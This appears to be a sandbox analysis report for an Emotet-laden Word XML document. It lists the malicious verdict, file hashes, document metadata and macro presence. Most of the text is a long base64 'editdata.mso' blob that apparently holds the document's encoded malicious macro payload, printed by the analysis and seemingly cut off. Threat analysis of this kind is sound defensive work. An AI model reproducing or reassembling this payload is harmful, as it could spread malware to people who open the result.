File name: | 05616586598.doc |
Full analysis: | https://app.any.run/tasks/7e26b191-e886-4845-bbdc-29dfefe421dc |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 22, 2019, 15:14:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | DF1B636312F266DFD19EF1E99F388B81 |
SHA1: | 778CFAE5B20EFB29B3DD837CA7191315F298C3D1 |
SHA256: | 81A1837A1F222BEE32C84622BF0AAED551D08644F68AA3209EC3DB35696BBEB1 |
SSDEEP: | 3072:uFntGJpjL/xSu90OoiLuDKZXfwKeljR1z:uJEhxUOmD+XfwLX |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentMacrosPresent: | yes |
---|---|
WordDocumentEmbeddedObjPresent: | no |
WordDocumentOcxPresent: | no |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 13:10:00Z |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 13:10:00Z |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentDocSuppDataBinData: | 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 